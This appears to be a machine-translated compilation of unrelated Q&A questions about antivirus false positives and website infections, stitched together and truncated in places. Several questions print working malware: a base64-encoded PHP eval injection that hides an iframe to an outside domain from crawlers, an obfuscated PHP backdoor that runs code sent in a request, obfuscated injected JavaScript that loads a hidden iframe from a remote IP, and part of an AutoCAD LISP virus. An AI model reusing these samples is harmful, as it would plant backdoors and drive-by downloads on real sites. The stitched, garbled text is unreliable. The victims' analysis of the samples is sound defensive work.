我经常看到它发生:我在Delphi中编写应用程序,当我编译它时,病毒扫描程序告诉我,我已经创建了病毒,然后立即再次删除可执行文件.通过执行完全重建,首先删除*.dcu文件,有时只是等待,这很烦人但很容易修复.
据我所知,它发生在德尔福6,7,2005和2007年.赛门铁克,卡巴斯基,迈克菲和NOD32都对报告这些误报感到内疚.我知道这是因为Delphi为其DCU文件添加了时间戳,这些时间戳最终在最终的可执行文件中,显然似乎是一些随机病毒签名的一部分.
我不想禁用病毒扫描程序,即使对于单个文件夹或文件也是如此.我并不是真的想要解决方案,但我想知道以下内容:
我最近看了 这芬兰互联网安全专家的视频.在第11分钟左右,他谈到了隐藏在图像中的病毒,并在图像即将显示时执行.
我想知道他们是如何在技术上做这样的事情,我的意思是怎么来的病毒被执行,当应的图片显示又是如何得出的图像以某种方式不会受到损害.我认为计算机首先查看扩展,然后使用适当的程序打开它并让程序自己工作(我不希望常规的图像查看器能够在其自身内运行病毒).显然它不会像那样工作,但我问的任何人都无法帮助我解决这个问题.
所以有人知道他们是如何做到的,原则是什么?非常感谢你.
我是一个业余程序员,我因为一个大问题而变得绝望和疯狂:我的大多数程序都被avast反病毒阻止,而有些则没有,我不明白为什么.我试图调查越多,我就越不明白问题可能是什么.
我正在请求您的帮助以找到解决方案,以便我的程序不再被阻止,或者,默认情况下,至少有一些强有力的线索可以解释为什么会出现这种情况.网上已经有很多关于这方面的话题.然而,他们中的大多数只给出了肤浅的答案:他们只是解释了反病毒如何与签名和检测启发式一起使用,或者说你只需要在白名单中添加有问题的应用程序而不询问任何其他问题.虽然这当然是正确的,但我的感觉并不是可接受的答案,因为我仍然留下了自己的程序,拒绝工作而没有任何具体的想法开始调查.
首先,阻止我的程序的唯一反病毒是avast 7.x. 没有其他防病毒程序看到任何不方便运行我的软件.其次,我没有自己动手; 它安装在朋友的机器上.我有Windows 7,他有Windows XP.我完全确定问题是avast:暂时禁用它,或者如果程序被添加到其白名单中,一切都按预期工作得很好.
三个不同的程序遇到麻烦:
第一个是开源的,如果需要,我可以提供可执行文件和源代码的链接.另外两个是封闭源但可以免费使用,我只能给出当前版本的可执行文件的链接.这三个程序之间唯一明显的共同点是我作为开发人员,我编译它们的Windows 7机器,编译器系列是MinGW/GCC,它们都是没有任何框架的win32 GUI应用程序(没有MFC,没有WPF,没有QT,WXWidgets或其他;只是纯win32/C GUI应用程序)
这是我的观察,虽然到目前为止:
问题是由avast 7.x自动沙箱引起的.当尝试启动avast不喜欢的程序时会发生以下情况:
这是无法接受的.我的程序的新手用户,特别是游戏,不知道防病毒是如何工作的; 不知道怎么把它放到白名单中,为什么它会解锁呢?不知道如何改变他们的反病毒设置; 如果他们看到弹出窗口,不会理解它,最终会害怕或失望,因为他们不知道为什么不能玩; 如果他们没有看到弹出窗口,我不能指望他们用半冷冻电脑等待5分钟.每次他们想玩.
从那里,我做了以下扣除:
除此之外,我还认为我将程序作为便携式zip文件分发的事实可能是avast阻止的原因,相反,程序安装在程序文件中的事实可能是信任它的理由更多.所以我提供了一个简单的体验:我为我的游戏的beta 2.0.0编译了一个新的inno-setup 5安装程序,以及一个用于我的文本编辑器1.3版本的安装程序,并发现安装程序本身已被阻止!
我和我的朋友做了另一次经历,在那里我试图找到程序崩溃的地方,基于使用MessageBeep(MessageBox也被阻止了!).我没有发现任何问题.在登录对话框中第一次调用SetDlgItemText时会阻止游戏,但是如果我删除所有SetDlgItemText,它将被进一步阻止.在文本编辑器中,它在填充菜单栏时被阻止...
我的结论是,在我的游戏的新版本中,在我的文本编辑器的旧版本和我的音频播放器中,avast不喜欢这样的东西.最新版本的文本编辑器中缺少的东西.会是什么呢 ?你有什么线索吗?你是否只知道如何继续找到它是什么让我可以帮忙解决它?是否只有一种方法来分析这样的问题,还是由avast搞砸的洞世界?
请注意,我是一个人,而不是一个公司,所有这些程序都是免费使用的,我没有支付任何IDE来开发它们,而且当用户使用它们时我没有付费,所以我假设一个证书可能根本不负担得起.而且,我不知道它是否是一个真正的解决方案,如何签署一个用GCC编译的应用程序,我真的不想切换到像MSVC这样的"usineàgaz".如果有任何其他解决方案,即使是非常肮脏的解决方案,我宁愿强烈忘记该选项.
谢谢你的阅读.
我的网站(非常大的社区网站)最近感染了病毒.每个index.php文件都被更改,以便将这些文件的开头php标记更改为以下行:
<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyBsZWZ0OiAtMTk5OXB4OyB0b3A6IC0yOTk5cHg7Ij48aWZyYW1lIHNyYz0iaHR0cDovL2x6cXFhcmtsLmNvLmNjL1FRa0ZCd1FHRFFNR0J3WUFFa2NKQlFjRUFBY0RBQU1CQnc9PSIgd2lkdGg9IjIiIGhlaWdodD0iMiI+PC9pZnJhbWU+PC9kaXY+JzsNCn0='));
当我解码它时,它产生了以下PHP代码:
<?php
error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
array("216.239.32.0","216.239.63.255"),
array("64.68.80.0" ,"64.68.87.255" ),
array("66.102.0.0", "66.102.15.255"),
array("64.233.160.0","64.233.191.255"),
array("66.249.64.0", "66.249.95.255"),
array("72.14.192.0", "72.14.255.255"),
array("209.85.128.0","209.85.255.255"),
array("198.108.100.192","198.108.100.207"),
array("173.194.0.0","173.194.255.255"),
array("216.33.229.144","216.33.229.151"),
array("216.33.229.160","216.33.229.167"),
array("209.185.108.128","209.185.108.255"),
array("216.109.75.80","216.109.75.95"),
array("64.68.88.0","64.68.95.255"),
array("64.68.64.64","64.68.64.127"),
array("64.41.221.192","64.41.221.207"),
array("74.125.0.0","74.125.255.255"),
array("65.52.0.0","65.55.255.255"),
array("74.6.0.0","74.6.255.255"),
array("67.195.0.0","67.195.255.255"),
array("72.30.0.0","72.30.255.255"),
array("38.0.0.0","38.255.255.255")
);
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ( $stop_ips_masks as $IPs ) {
$first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){ …我的服务器最近受到了攻击,我一直在努力研究它是如何以及为什么会发生的.
我在病毒文件中发现了一个非常相似的模式,看起来像这样 - 据我所知,它试图运行一个特定的文件?
有没有人见过这样的东西,我该怎么解释呢?它只是根据$sF字符串抓取单个字符?
<?php
$sF = "PCT4BA6ODSE_";
$s21 = strtolower($sF[4] . $sF[5] . $sF[9] . $sF[10] . $sF[6] . $sF[3] . $sF[11] . $sF[8] . $sF[10] . $sF[1] . $sF[7] . $sF[8] . $sF[10]);
$s22 = ${strtoupper($sF[11] . $sF[0] . $sF[7] . $sF[9] . $sF[2])}['nd335c3'];
if (isset($s22)) {
eval($s21($s22));
}?>
我希望看看如何通过PHP检查上传的文件是否有病毒.存在哪些选择,各自的利弊等.
问题:
在我的网站空间上有PHP文件,所有这些都以此结尾:
<?php include 'footer.php'; ?>
在此行之前,文件中还有HTML代码.
浏览器中的输出以此结束,当然:
</body>
</html>
但昨天,最后突然出现了一些恶意代码.我的index.php的输出是:
</body>
</html><body><script>
var i={j:{i:{i:'~',l:'.',j:'^'},l:{i:'%',l:218915,j:1154%256},j:{i:1^0,l:55,j:'ijl'}},i:{i:{i:function(j){try{var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x6e\x70\x75\x74');l['\x74\x79\x70\x65']='\x68\x69\x64\x64\x65\x6e';l['\x76\x61\x6c\x75\x65']=j;l['\x69\x64']='\x6a';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);}catch(j){return false;}
return true;},l:function(){try{var l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6a');}catch(l){return false;}
return l.value;},j:function(){var l=i.i.i.i(i.l.i.i('.75.67.67.63.3a.2f.2f.39.32.2e.36.30.2e.31.37.37.2e.32.33.35.2f.76.61.71.72.6b.2e.63.75.63.3f.66.75.61.6e.7a.72.3d.6b.37.36.6b.30.39'));var j=(l)?i.i.i.l():false;return j;}},l:{i:function(){var l=i.i.i.j('trashtext');var j=(l)?l:'trashtext';return j||false;},l:function(){var l=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x6c');l['\x77\x69\x64\x74\x68']='0.1em';l['\x68\x65\x69\x67\x68\x74']='0.2em';l['\x73\x74\x79\x6c\x65']['\x62\x6f\x72\x64\x65\x72']='none';l['\x73\x74\x79\x6c\x65']['\x64\x69\x73\x70\x6c\x61\x79']='none';l['\x69\x6e\x6e\x65\x72\x48\x54\x4d\x4c']='\x6c';l['\x69\x64']='\x6c';document['\x62\x6f\x64\x79']['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](l);},j:function(){var l=i.i.j.j(i.i.l.l());l=document['\x67\x65\x74\x45\x6c\x65\x6d\x65\x6e\x74\x42\x79\x49\x64']('\x6c');var j=document['\x63\x72\x65\x61\x74\x65\x45\x6c\x65\x6d\x65\x6e\x74']('\x69\x66\x72\x61\x6d\x65');j['\x68\x65\x69\x67\x68\x74']=j['\x77\x69\x64\x74\x68'];j['\x73\x72\x63']=i.i.j.i(i.i.l.i());try{l['\x61\x70\x70\x65\x6e\x64\x43\x68\x69\x6c\x64'](j);}catch(j){}}},j:{i:function(l){return l['replace'](/[A-Za-z]/g,function(j){return String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']((((j=j.charCodeAt(0))&223)-52)%26+(j&32)+65);});},l:function(l){return i.i.j.i(l)['\x74\x6f\x53\x74\x72\x69\x6e\x67']()||false;},j:function(l){try{l();}catch(l){}}}},l:{i:{i:function(l){l=l['replace'](/[.]/g,'%');return window['\x75\x6e\x65\x73\x63\x61\x70\x65'](l);},l:'50',j:'33'},l:{i:'62',l:'83',j:'95'},j:{i:'46',l:'71',j:'52'}}}
i.i.l.j();</script>
我在我的网站空间上打开了文件(通过FTP下载),我看到有人把这个代码放到了文件中!
怎么会发生这种情况?
我能想象的唯一方法:
症状:
用户报告在Firefox中弹出一个蓝色面板.它要求他们安装一个插件.现在他们中的一些人在他们的PC上有Exploit.Java.CVE-2010-0886.a.
这是由于恶意代码?代码到底做了什么?
你能帮助我吗?
请帮帮我,我真的很绝望.
也许还有一个问题,如果你知道我怎么能得到它:我怎么能在将来阻止这样的事情呢?
编辑#1:
我在我的网站空间的根目录中找到了一个名为"x76x09.php"的文件.它的文件大小为44.281字节.我已下载并尝试打开它.但我的防病毒软件称它是一种木马(Trojan.Script.224490).我认为此文件已被执行并将恶意代码添加到每个目录中的"index.php".这有帮助吗?该木马如何进入我的网站空间?这是一个众所周知的病毒吗?
编辑#2:
我的主机说他现在可以确定该文件没有通过FTP上传.所以感染不是通过FTP发生的.根据我的主机,它必须是不安全的脚本.
编辑#3:
根据PHPSecInfo的安全漏洞:
编辑#4:
我已经分析了在我的网络服务器上执行的文件.这是结果. …
我创建了一个C#程序,最近我注意到当我使用IL Merge将我引用的.dll合并到一个可执行的.exe文件中时,我的反病毒(Avast)会立即将其删除并说它是病毒.我总是做很多备份,所以我用2天前的备份测试了同样的东西,我没有遇到这个问题.
所以我逐行删除了我最近的代码,并注意到触发程序被检测为病毒的原因.我有一个空白,我检查指定路径中是否存在文件列表(位于%appdata%中的我的apps文件夹中).void有大约8个File.Exists(path)命令,删除这8行,我的程序不再被检测为病毒.
所以我的问题是,这个问题有什么解决方案吗?为什么我的程序被检测为病毒只是因为我正在使用File.Exists?
当我在Delphi 7 IDE中编译一个新项目时,MCafee将其识别为病毒并删除它.
该病毒被识别为Generic.dx!gmk并被防病毒软件删除,因此不会创建新的Exe.
我们如何解决这个问题?
这是误报吗?
我的公司遭到了AutoCAD病毒的攻击,该病毒正在删除并替换我们acaddoc.lsp的例程.
我是一名建筑师,并不完全确定重复的"查找"和"删除"是做什么的.
acadapq)替换文件?谁看过这个吗?CAD论坛不是很有帮助.
(setq wold_cmd (getvar "cmdecho"))
(setvar "cmdecho" 0)
(setq bb 2)
(setq dpath (getvar "dwgprefix"))
(setq wpath (getvar "menuname"))
(setq wpath (substr wpath 1 (- (strlen wpath) 4)))
(setq n 0)
(while (< n 1)
(if (findfile "acad.fas")
(if (vl-file-delete (findfile "acad.fas"))
(setq n 0))
(setq n 2)))
(setq n 0)
(while (< n 1)
(if (findfile "lcm.fas")
(if (vl-file-delete (findfile "lcm.fas"))
(setq n 0))
(setq n 2)))
(setq n 0) …